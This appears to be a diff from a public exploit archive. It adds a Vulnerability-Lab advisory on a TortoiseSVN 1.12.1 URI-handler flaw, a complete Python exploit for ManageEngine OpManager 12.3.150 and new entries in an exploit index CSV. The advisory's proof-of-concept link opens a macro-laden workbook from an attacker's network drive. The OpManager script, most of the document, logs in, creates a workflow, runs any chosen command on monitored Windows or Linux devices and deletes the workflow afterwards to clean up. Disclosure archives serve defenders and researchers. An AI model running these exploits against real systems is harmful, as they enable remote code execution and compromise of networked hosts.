+Vulnerability Laboratory ID (VL-ID):
+====================================
+2188
+
+
+Common Vulnerability Scoring System:
+====================================
+8.8
+
+
+Vulnerability Class:
+====================
+Code Execution
+
+
+Current Estimated Price:
+========================
+4.000€ - 5.000€
+
+
+Product & Service Introduction:
+===============================
+TortoiseSVN is a really easy to use Revision control / version control /
+source control software for Windows.
+It is based on Apache Subversion (SVN); TortoiseSVN provides a nice and
+easy user interface for Subversion.
+It is developed under the GPL. Which means it is completely free for
+anyone to use, including in a commercial
+environment, without any restriction. The source code is also freely
+available, so you can even develop your
+own version if you wish to. Since it's not an integration for a specific
+IDE like Visual Studio, Eclipse or
+others, you can use it with whatever development tools you like, and
+with any type of file.
+
+(Copy of the about page: https://tortoisesvn.net/about.html )
+
+
+Abstract Advisory Information:
+==============================
+A vulnerability laboratory researcher (vxrl team) discovered a remote
+code execution vulnerability in the TortoiseSVN v1.12.1 software.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2019-08-13: Public Disclosure (Vulnerability Laboratory)
+
+Affected Product(s):
+====================
+TortoiseSVN
+Product: TortoiseSVN - Software 1.12.1
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Pre auth - no privileges
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+A remote code execution vulnerability has been uncovered in the official
+TortoiseSVN v1.12.1 software.
+The vulnerability typ allows remote attackers to execute arbitrary codes
+to compromise a target computer system.
+
+The URI handler of TortoiseSVN (Tsvncmd:) allows a customised diff
+operation on Excel workbooks, which could be used to open remote
+workbooks without protection from macro security settings to execute
+arbitrary code.
+
+The `tsvncmd:command:diff?path:[file1]?path2:[file2]` will execute a
+customised diff on [file1] and [file2] based on the file extension.
+For xls files, it will execute the script `diff-xls.js` using wscript,
+which will open the two files for analysis without any macro
+security warning. An attacker can exploit this by putting a macro virus
+in a network drive, and force the victim to open the workbooks
+and execute the macro inside. Since the macro is triggered through
+wscript, to make the attack less visible, one could kill the wscript
+process and quit the excel program after the code was executed.
+
+
+Proof of Concept (PoC):
+=======================
+The vulnerability could be triggered by visiting a specially crafted URL
+via web browser.
+To reproduce the vulnerability, one could simply create a .url file or
+open the URL with a browsers,
+but a notification prompt may be shown for the latter case.
+
+<a
+href='tsvncmd:command:diff?path:VBoxSvrvv.xlsm?path2:VBoxSvrvw.xlsx'>Checkout
+the Repo with TortoiseSVN</a>
+
+where VBoxSvrv is the remote network drive controlled by the attacker,
+v.xlsm is the macro virus and w.xlsx is just an empty excel workbook.
+
+Sources: https://www.vulnerability-lab.com/resources/documents/2188.rar
+Password: 23vxrl23
+
+PoC: Video
+https://www.youtube.com/watch?v=spvRSC377vI
+
+
+Security Risk:
+==============
+The security risk of the remote code execution vulnerability in the
+software component is estimated as high.
+
+
+Credits & Authors:
+==================
+PingFanZettaKe [VXRL Team] -
+https://www.vulnerability-lab.com/show.php?user=PingFanZettaKe
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php

exploits/windows/webapps/47255.py

@@ -0,0 +1,266 @@
+#!/usr/bin/env python3
+
+# Exploit Title: ManageEngine opManager Authenticated Code Execution
+# Google Dork: N/A
+# Date: 08/13/2019
+# Exploit Author: @kindredsec
+# Vendor Homepage: https://www.manageengine.com/
+# Software Link: https://www.manageengine.com/network-monitoring/download.html
+# Version: 12.3.150
+# Tested on: Windows Server 2016
+# CVE: N/A
+
+import requests
+import re
+import random
+import sys
+import json
+import string
+import argparse
+
+C_WHITE = '\033[1;37m'
+C_BLUE = '\033[1;34m'
+C_GREEN = '\033[1;32m'
+C_YELLOW = '\033[1;33m'
+C_RED = '\033[1;31m'
+C_RESET = '\033[0m'
+LOGIN_FAIL_MSG = "Invalid username and/or password."
+
+def buildRandomString(length=10):
+	letters = string.ascii_lowercase
+	return ''.join(random.choice(letters) for i in range(length))
+
+
+def getSessionData(target, user, password):
+
+	session = requests.Session()
+	session.get(target)
+
+	# Login Sequence
+	randSid = random.uniform(-1,1)
+	getParams = { "requestType" : "AJAX" , "sid" : str(randSid) }
+	postData = { "eraseAutoLoginCookie" : "true" }
+	session.post( url = target + "/servlets/SettingsServlet", data = postData, params = getParams )
+
+	postData = { "loginFromCookieData" : "false",
+						 "ntlmv2" : "false", 
+						 "j_username" : user,
+						 "j_password" : password 
+						}
+	initialAuth = session.post( url = target + "/j_security_check", data = postData ) 
+
+
+	if LOGIN_FAIL_MSG in initialAuth.text:
+
+		print(f"{C_RED}[-]{C_RESET} Invalid credentials specified! Could not login to OpManager.")
+		sys.exit(1)
+
+	elif initialAuth.status_code != 200:
+		print(f"{C_RED}[-]{C_RESET} An Unknown Error has occurred during the authentication process.")
+		sys.exit(1)
+
+	apiKeyReg = re.search(".*\.apiKey = .*;", initialAuth.text)
+	apiKey = apiKeyReg.group(0).split('"')[1]
+
+	return { "session" : session , "apiKey" : apiKey }
+
+
+
+
+def getDeviceList(target, session, apiKey):
+
+	deviceList = session.get( target + "/api/json/v2/device/listDevices" , params = { "apiKey" : apiKey } )
+
+	devices = {}
+	devicesJsonParsed = json.loads(deviceList.text)
+	for row in devicesJsonParsed["rows"]:
+		devices[row["deviceName"]] = [ row["ipaddress"], row["type"] ]
+
+	return devices
+
+
+
+def buildTaskWindows(target, session, apiKey, device, command):
+
+	# Build Task
+	taskName = buildRandomString()
+	workFlowName = buildRandomString(15)
+
+	jsonData = """{"taskProps":{"mainTask":{"taskID":9,"dialogId":3,"name":"""
+	jsonData += '"' + taskName + '"'
+	jsonData += ""","deviceDisplayName":"${DeviceName}","cmdLine":"cmd.exe /c ${FileName}.bat ${DeviceName} ${UserName} ${Password} arg1","scriptBody":""" 
+	jsonData += '"' + command + '"'
+	jsonData +=  ""","workingDir":"${UserHomeDir}","timeout":"60","associationID":-1,"x":41,"y":132},"name":"Untitled","description":""},"triggerProps":{"workflowDetails":{"wfID":"","wfName":"""
+	jsonData += '"' + workFlowName + '"' 
+	jsonData += ""","wfDescription":"Thnx for Exec","triggerType":"0"},"selectedDevices":["""
+	jsonData += '"' +  device + '"' 
+	jsonData += """],"scheduleDetails":{"schedType":"1","selTab":"1","onceDate":"2999-08-14","onceHour":"0","onceMin":"0","dailyHour":"0","dailyMin":"0","dailyStartDate":"2019-08-14","weeklyDay":[],"wee"""
+	jsonData += """klyHour":"0","weeklyMin":"0","monthlyType":"5","monthlyWeekNum":"1","monthlyDay":["1"],"monthlyHour":"0","monthlyMin":"0","yearlyMonth":["0"],"yearlyDate":"1","yearlyHour":"0","y"""
+	jsonData += """earlyMin":"0"},"criteriaDetails":{}}}"""
+
+	makeWorkFlow = session.post(url = target + "/api/json/workflow/addWorkflow", params = { "apiKey" : apiKey }, data = { "jsonData" : jsonData })
+
+	if "has been created successfully" in makeWorkFlow.text:
+		print(f"{C_GREEN}[+]{C_RESET} Successfully created Workflow")
+	else:
+		print(f"{C_RED}[-]{C_RESET} Issues creating workflow. Exiting . . .")
+		sys.exit(1)
+
+	return workFlowName
+
+
+def buildTaskLinux(target, session, apiKey, device, command):
+
+	taskName = buildRandomString()
+	workFlowName = buildRandomString(15)
+
+	jsonData = """{"taskProps":{"mainTask":{"taskID":9,"dialogId":3,"name":"""
+	jsonData += '"' + taskName + '"'
+	jsonData += ""","deviceDisplayName":"${DeviceName}","cmdLine":"sh ${FileName} ${DeviceName} arg1","scriptBody":""" 
+	jsonData += '"' + command + '"'
+	jsonData +=  ""","workingDir":"${UserHomeDir}","timeout":"60","associationID":-1,"x":41,"y":132},"name":"Untitled","description":""},"triggerProps":{"workflowDetails":{"wfID":"","wfName":"""
+	jsonData += '"' + workFlowName + '"' 
+	jsonData += ""","wfDescription":"Thnx for Exec","triggerType":"0"},"selectedDevices":["""
+	jsonData += '"' +  device + '"' 
+	jsonData += """],"scheduleDetails":{"schedType":"1","selTab":"1","onceDate":"2999-08-14","onceHour":"0","onceMin":"0","dailyHour":"0","dailyMin":"0","dailyStartDate":"2019-08-14","weeklyDay":[],"wee"""
+	jsonData += """klyHour":"0","weeklyMin":"0","monthlyType":"5","monthlyWeekNum":"1","monthlyDay":["1"],"monthlyHour":"0","monthlyMin":"0","yearlyMonth":["0"],"yearlyDate":"1","yearlyHour":"0","y"""
+	jsonData += """earlyMin":"0"},"criteriaDetails":{}}}"""
+
+	makeWorkFlow = session.post(url = target + "/api/json/workflow/addWorkflow", params = { "apiKey" : apiKey }, data = { "jsonData" : jsonData })
+
+	if "has been created successfully" in makeWorkFlow.text:
+		print(f"{C_GREEN}[+]{C_RESET} Successfully created Workflow")
+	else:
+		print(f"{C_RED}[-]{C_RESET} Issues creating workflow. Exiting . . .")
+		sys.exit(1)
+
+	return workFlowName
+
+
+# Get the ID of the newly created workflow
+def getWorkflowID(target, session, apiKey, workflowName):
+
+	getID = session.get(url = target + "/api/json/workflow/getWorkflowList", params = { "apiKey" : apiKey })
+
+	rbID = -100
+	workflowJsonParsed = json.loads(getID.text)
+	for wf in workflowJsonParsed:
+		if wf['name'] == workflowName:
+			rbID = wf['rbID'] 
+
+	if rbID == -100: 
+		print(f"{C_RED}[-]{C_RESET} Issue obtaining Workflow ID. Exiting ...")
+		sys.exit(1)
+
+	return rbID
+
+
+def getDeviceID(target, session, apiKey, rbID, device):
+
+	getDevices = session.get(url = target + "/api/json/workflow/showDevicesForWorkflow", params = { "apiKey" : apiKey , "wfID" : rbID })
+	wfDevicesJsonParsed = json.loads(getDevices.text)
+	wfDevices = wfDevicesJsonParsed["defaultDevices"]
+	deviceID = list(wfDevices.keys())[0]
+
+	return deviceID
+
+
+
+def runWorkflow(target, session, apiKey, rbID, device):
+
+	targetDeviceID = getDeviceID(target, session, apiKey, rbID, device)
+	
+	print(f"{C_YELLOW}[!]{C_RESET} Executing Code . . .")
+	workflowExec = session.post(target + "/api/json/workflow/executeWorkflow", params = { "apiKey" : apiKey }, data = { "wfID" : rbID, "deviceName" : targetDeviceID, "triggerType" : 0 }	)
+
+	if re.match(r"^\[.*\]$", workflowExec.text.strip()):
+		print(f"{C_GREEN}[+]{C_RESET} Code appears to have run successfully!")
+	else:
+		print(f"{C_RED}[-]{C_RESET} Unknown error has occurred. Please try again or run the process manually.")
+		sys.exit(1)
+
+	deleteWorkflow(target, session, apiKey, rbID)
+	print(f"{C_GREEN}[+]{C_RESET} Exploit complete!")
+
+
+def deleteWorkflow(target, session, apiKey, rbID):
+	
+	print(f"{C_YELLOW}[!]{C_RESET} Cleaning up . . .")
+	delWorkFlow = session.post( target + "/api/json/workflow/deleteWorkflow" , params = { "apiKey" : apiKey, "wfID" : rbID })
+
+
+def main():
+
+	parser = argparse.ArgumentParser(description="Utilizes OpManager's Workflow feature to execute commands on any monitored device.")
+	parser.add_argument("-t", nargs='?', metavar="target", help="The full base URL of the OpManager Instance (Example: http://192.168.1.1)")
+	parser.add_argument("-u", nargs='?', metavar="user", help="The username of a valid OpManager admin account.")
+	parser.add_argument("-p", nargs='?', metavar="password", help="The password of a valid OpManager admin account.")
+	parser.add_argument("-c", nargs='?', metavar="command", help="The command you want to run.")
+
+	args = parser.parse_args()
+	
+	insufficient_args = False
+	if not args.u:
+		print(f"{C_RED}[-]{C_RESET} Please specify a username with '-t'.")
+		insufficient_args = True
+	if not args.t:
+		print(f"{C_RED}[-]{C_RESET} Please specify a target with '-t'.")
+		insufficient_args = True
+	if not args.p:
+		print(f"{C_RED}[-]{C_RESET} Please specify a password with '-p'.")
+		insufficient_args = True
+	if not args.c:
+		print(f"{C_RED}[-]{C_RESET} Please specify a command with '-c'.")
+		insufficient_args = True
+
+	if insufficient_args:
+		sys.exit(1)
+
+	
+	sessionDat = getSessionData(args.t, args.u, args.p)
+	session = sessionDat["session"]
+	apiKey = sessionDat["apiKey"]
+
+	devices = getDeviceList(args.t, session, apiKey)
+
+	# if there's only one device in the OpManager instance, default to running commands on that device;
+	# no need to ask the user.
+	if len(devices.keys()) == 1:
+		device = list(devices.keys())[0]
+	else:
+		print(f"{C_YELLOW}[!]{C_RESET} There appears to be multiple Devices within this target OpManager Instance:")
+		print("")
+		counter = 1
+		for key in devices.keys():
+			print(f"   {counter}: {key} ({devices[key][0]}) ({devices[key][1]})")
+
+		print("")
+		while True:
+			try:
+				prompt = f"{C_BLUE}[?]{C_RESET} Please specify which Device you want to run your command on: "
+				devSelect = int(input(prompt))
+			except KeyboardInterrupt:
+				sys.exit(1)
+			except ValueError:
+				print(f"{C_RED}[-]{C_RESET} Error. Invalid Device number selected. Quitting . . .")
+				sys.exit(1)
+	
+			if devSelect < 1 or devSelect > len(list(devices.keys())):
+				print(f"{C_RED}[-]{C_RESET} Error. Invalid Device number selected. Quitting . . .")
+				sys.exit(1)
+
+			else:
+				device = list(devices.keys())[counter - 1]
+				break
+
+	# don't hate, it works doesn't it?
+	if "indows" in devices[device][1]:
+		workflowName = buildTaskWindows(args.t, session, apiKey, device, args.c)
+	else:
+		workflowName = buildTaskLinux(args.t, session, apiKey, device, args.c)
+
+	workflowID =  getWorkflowID(args.t, session, apiKey, workflowName)
+	runWorkflow(args.t, session, apiKey, workflowID, device)
+	
+	
+main()

files_exploits.csv

@@ -6525,6 +6525,8 @@ id,file,description,date,author,type,platform,port
 47233,exploits/vxworks/dos/47233.py,"VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow",2019-08-12,"Zhou Yu",dos,vxworks,
 47236,exploits/linux/dos/47236.c,"Linux - Use-After-Free Reads in show_numa_stats()",2019-08-12,"Google Security Research",dos,linux,
 47237,exploits/multiple/dos/47237.txt,"WebKit - UXSS via XSLT and Nested Document Replacements",2019-08-12,"Google Security Research",dos,multiple,
+47248,exploits/windows/dos/47248.py,"Windows PowerShell - Unsanitized Filename Command Execution",2019-08-14,hyp3rlinx,dos,windows,
+47254,exploits/linux/dos/47254.txt,"ABC2MTEX 1.6.1 - Command Line Stack Overflow",2019-08-14,"Carter Yagemann",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10632,6 +10634,7 @@ id,file,description,date,author,type,platform,port
 47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows,
 47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux,
 47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
+47253,exploits/windows/local/47253.cpp,"Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion",2019-08-14,"Abdelhamid Naceri",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17606,6 +17609,7 @@ id,file,description,date,author,type,platform,port
 47230,exploits/linux/remote/47230.rb,"Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)",2019-08-12,AkkuS,remote,linux,
 47243,exploits/php/remote/47243.py,"Agent Tesla Botnet - Arbitrary Code Execution",2019-08-13,prsecurity,remote,php,
 47244,exploits/php/remote/47244.py,"AZORult Botnet - SQL Injection",2019-08-13,prsecurity,remote,php,
+47256,exploits/php/remote/47256.rb,"Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)",2019-08-14,"Ege Balci",remote,php,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41606,3 +41610,11 @@ id,file,description,date,author,type,platform,port
 47225,exploits/php/webapps/47225.txt,"osTicket 1.12 - Formula Injection",2019-08-12,"Aishwarya Iyer",webapps,php,80
 47226,exploits/php/webapps/47226.txt,"osTicket 1.12 - Persistent Cross-Site Scripting",2019-08-12,"Aishwarya Iyer",webapps,php,80
 47232,exploits/php/webapps/47232.txt,"Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection",2019-08-12,qw3rTyTy,webapps,php,80
+47234,exploits/php/webapps/47234.py,"Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download",2019-08-12,xerubus,webapps,php,80
+47235,exploits/php/webapps/47235.py,"Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell",2019-08-12,xerubus,webapps,php,
+47247,exploits/php/webapps/47247.txt,"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting",2019-08-14,"Ilca Lucian Florin",webapps,php,80
+47249,exploits/php/webapps/47249.txt,"Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'customfields.php' SQL Injection",2019-08-14,qw3rTyTy,webapps,php,80
+47250,exploits/hardware/webapps/47250.rb,"D-Link DIR-600M - Authentication Bypass (Metasploit)",2019-08-14,"Devendra Singh Solanki",webapps,hardware,80
+47251,exploits/php/webapps/47251.txt,"WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery",2019-08-14,"Princy Edward",webapps,php,80
+47252,exploits/windows/webapps/47252.txt,"TortoiseSVN 1.12.1 - Remote Code Execution",2019-08-14,Vulnerability-Lab,webapps,windows,
+47255,exploits/windows/webapps/47255.py,"ManageEngine opManager 12.3.150 - Authenticated Code Execution",2019-08-14,kindredsec,webapps,windows,